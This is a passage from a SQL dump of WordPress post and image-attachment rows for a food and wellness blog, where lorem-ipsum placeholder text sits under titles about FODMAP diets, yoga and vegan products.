\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Working with a dietitian','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','best-milk-substitute-for-new-vegans','','','2020-04-12 07:58:36','2020-04-12 07:58:36','',0,'http://succulents.select-themes.com/?p=875',0,'post','',3),(902,1,'2018-01-23 08:14:20','2018-01-23 08:14:20','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','What is the low FODMAP diet','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','fast-recepies-for-fast-breakfast-solutions','','','2020-04-12 08:34:07','2020-04-12 08:34:07','',0,'http://succulents.select-themes.com/?p=902',0,'post','',3),(904,1,'2018-01-25 10:12:49','2018-01-25 10:12:49','','h5-slider-graphic-2','','inherit','open','closed','','h5-slider-graphic-2','','','2018-01-25 10:12:49','2018-01-25 10:12:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-slider-graphic-2.jpg',0,'attachment','image/jpeg',0),(905,1,'2018-01-25 10:14:06','2018-01-25 10:14:06','','h5-slider-graphic-3','','inherit','open','closed','','h5-slider-graphic-3','','','2018-01-25 10:14:06','2018-01-25 10:14:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-slider-graphic-3.jpg',0,'attachment','image/jpeg',0),(906,1,'2020-04-12 08:24:35','2020-04-12 08:24:35','','FODMAPsmall','','inherit','open','closed','','fodmapsmall','','','2020-04-12 08:24:50','2020-04-12 08:24:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/FODMAPsmall.jpg',0,'attachment','image/jpeg',0),(910,1,'2018-01-23 07:17:05','2018-01-23 07:17:05','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Yoga for a troubling Tummy','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','organic-vegan-cosmetics-and-make-up','','','2020-04-12 08:33:16','2020-04-12 08:33:16','',0,'http://succulents.select-themes.com/?p=910',0,'post','',3),(912,1,'2020-04-12 08:32:17','2020-04-12 08:32:17','','yoga-small-for-NW','','inherit','open','closed','','yoga-small-for-nw','','','2020-04-12 08:32:33','2020-04-12 08:32:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/yoga-small-for-NW.jpg',0,'attachment','image/jpeg',0),(913,1,'2018-01-25 10:20:41','2018-01-25 10:20:41','','h5-slider-graphic-1','','inherit','open','closed','','h5-slider-graphic-1','','','2018-01-25 10:20:41','2018-01-25 10:20:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-slider-graphic-1.jpg',0,'attachment','image/jpeg',0),(939,1,'2018-01-25 13:03:42','2018-01-25 13:03:42','','h8-background-img-1','','inherit','open','closed','','h8-background-img-1','','','2018-01-25 13:03:42','2018-01-25 13:03:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-background-img-1-1.jpg',0,'attachment','image/jpeg',0),(941,1,'2018-01-25 13:05:06','2018-01-25 13:05:06','','h8-slide1-background','','inherit','open','closed','','h8-slide1-background','','','2018-01-25 13:05:06','2018-01-25 13:05:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide1-background.jpg',0,'attachment','image/jpeg',0),(942,1,'2018-01-25 13:06:36','2018-01-25 13:06:36','','h8-slide1-graphic4','','inherit','open','closed','','h8-slide1-graphic4','','','2018-01-25 13:06:36','2018-01-25 13:06:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide1-graphic4.png',0,'attachment','image/png',0),(943,1,'2018-01-25 13:07:28','2018-01-25 13:07:28','','h8-slide1-graphic1','','inherit','open','closed','','h8-slide1-graphic1','','','2018-01-25 13:07:28','2018-01-25 13:07:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide1-graphic1.png',0,'attachment','image/png',0),(944,1,'2018-01-25 13:07:30','2018-01-25 13:07:30','','h8-slide1-graphic2','','inherit','open','closed','','h8-slide1-graphic2','','','2018-01-25 13:07:30','2018-01-25 13:07:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide1-graphic2.png',0,'attachment','image/png',0),(947,1,'2018-01-25 13:21:22','2018-01-25 13:21:22','','h8-img-2','','inherit','open','closed','','h8-img-2','','','2018-01-25 13:21:22','2018-01-25 13:21:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-img-2.png',0,'attachment','image/png',0),(950,1,'2018-01-25 13:23:39','2018-01-25 13:23:39','','h8-signature','','inherit','open','closed','','h8-signature','','','2018-01-25 13:23:39','2018-01-25 13:23:39','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-signature.png',0,'attachment','image/png',0),(982,1,'2018-01-25 14:52:17','2018-01-25 14:52:17','','h8-img-9','','inherit','open','closed','','h8-img-9','','','2018-01-25 14:52:17','2018-01-25 14:52:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-img-9.jpg',0,'attachment','image/jpeg',0),(996,1,'2018-01-22 08:31:09','2018-01-22 08:31:09','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Take Perfect Calm Bubble Bath Everyday','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum neces sitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','take-perfect-calm-bubble-bath-everyday','','','2018-01-22 08:31:09','2018-01-22 08:31:09','',0,'http://succulents.select-themes.com/?p=996',0,'post','',3),(999,1,'2018-01-26 08:31:58','2018-01-26 08:31:58','','blog-img-13','','inherit','open','closed','','blog-img-13','','','2018-01-26 08:31:58','2018-01-26 08:31:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-13.jpg',0,'attachment','image/jpeg',0),(1002,1,'2018-01-22 07:58:46','2018-01-22 07:58:46','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Find Herbal Tea For Every Skin Complexion','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum neces sitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','find-herbal-tea-for-every-skin-complexion','','','2018-01-22 07:58:46','2018-01-22 07:58:46','',0,'http://succulents.select-themes.com/?p=1002',0,'post','',2),(1003,1,'2018-01-26 08:57:16','2018-01-26 08:57:16','','blog-img-12','','inherit','open','closed','','blog-img-12','','','2018-01-26 08:57:16','2018-01-26 08:57:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-12.jpg',0,'attachment','image/jpeg',0),(1004,1,'2018-01-26 08:57:32','2018-01-26 08:57:32','','blog-img-11','','inherit','open','closed','','blog-img-11','','','2018-01-26 08:57:32','2018-01-26 08:57:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-11.jpg',0,'attachment','image/jpeg',0),(1006,1,'2018-01-22 06:01:32','2018-01-22 06:01:32','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Homemade Organic Soaps For New Vegans','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum neces sitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','homemade-organic-soaps-for-new-vegans','','','2018-01-22 06:01:32','2018-01-22 06:01:32','',0,'http://succulents.select-themes.com/?p=1006',0,'post','',2),(1011,1,'2018-01-20 09:12:09','2018-01-20 09:12:09','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Keep Your Body, Mind And Soul In Ideal Balance','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','keep-your-body-mind-and-soul-in-ideal-balance','','','2018-01-20 09:12:09','2018-01-20 09:12:09','',0,'http://succulents.select-themes.com/?p=1011',0,'post','',2),(1013,1,'2018-01-26 09:12:36','2018-01-26 09:12:36','','blog-img-14','','inherit','open','closed','','blog-img-14','','','2018-01-26 09:12:36','2018-01-26 09:12:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-14.jpg',0,'attachment','image/jpeg',0),(1015,1,'2018-01-20 07:24:23','2018-01-20 07:24:23','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Yoga Classes Are The Best For Workout Beginners','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','yoga-classes-are-the-best-for-workout-beginners','','','2018-01-20 07:24:23','2018-01-20 07:24:23','',0,'http://succulents.select-themes.com/?p=1015',0,'post','',2),(1016,1,'2018-01-26 09:21:58','2018-01-26 09:21:58','','blog-img-15','','inherit','open','closed','','blog-img-15','','','2018-01-26 09:21:58','2018-01-26 09:21:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-15.jpg',0,'attachment','image/jpeg',0),(1019,1,'2018-01-20 06:27:39','2018-01-20 06:27:39','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','After Eight Hour Sitting Stretching Is Inevitable','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','after-eight-hour-sitting-stretching-is-inevitable','','','2018-01-20 06:27:39','2018-01-20 06:27:39','',0,'http://succulents.select-themes.com/?p=1019',0,'post','',2),(1020,1,'2018-01-26 09:25:29','2018-01-26 09:25:29','','blog-img-16','','inherit','open','closed','','blog-img-16','','','2018-01-26 09:25:29','2018-01-26 09:25:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-16.jpg',0,'attachment','image/jpeg',0),(1021,1,'2020-04-06 13:59:37','2020-04-06 13:59:37','','Long-orange-banan2','','inherit','open','closed','','long-orange-banan2','','','2020-04-06 14:00:24','2020-04-06 14:00:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/Long-orange-banan2.jpg',0,'attachment','image/jpeg',0),(1028,1,'2018-01-26 09:33:50','2018-01-26 09:33:50','','h1-slide2-background','','inherit','open','closed','','h1-slide2-background','','','2018-01-26 09:33:50','2018-01-26 09:33:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-slide2-background.jpg',0,'attachment','image/jpeg',0),(1029,1,'2020-04-06 17:16:55','2020-04-06 17:16:55','','Long-kale-pesto-for-web','','inherit','open','closed','','long-kale-pesto-for-web','','','2020-04-06 17:16:55','2020-04-06 17:16:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/Long-kale-pesto-for-web.jpg',0,'attachment','image/jpeg',0),(1030,1,'2018-01-19 09:38:54','2018-01-19 09:38:54','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Vegan Bowls Are Morning\'s Antioxidant','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','vegan-bowls-are-mornings-antioxidant','','','2018-01-19 09:38:54','2018-01-19 09:38:54','',0,'http://succulents.select-themes.com/?p=1030',0,'post','',2),(1033,1,'2018-01-19 07:48:16','2018-01-19 07:48:16','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Energy Smoothies For Quick Boost Up','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','energy-smoothies-for-quick-boost-up','','','2018-01-19 07:48:16','2018-01-19 07:48:16','',0,'http://succulents.select-themes.com/?p=1033',0,'post','',2),(1037,1,'2018-01-19 06:53:15','2018-01-19 06:53:15','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Ideal Organic Cosmetic Presents For Vegans','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','ideal-organic-cosmetic-presents-for-vegans','','','2018-01-19 06:53:15','2018-01-19 06:53:15','',0,'http://succulents.select-themes.com/?p=1037',0,'post','',2),(1043,1,'2018-01-26 10:03:53','2018-01-26 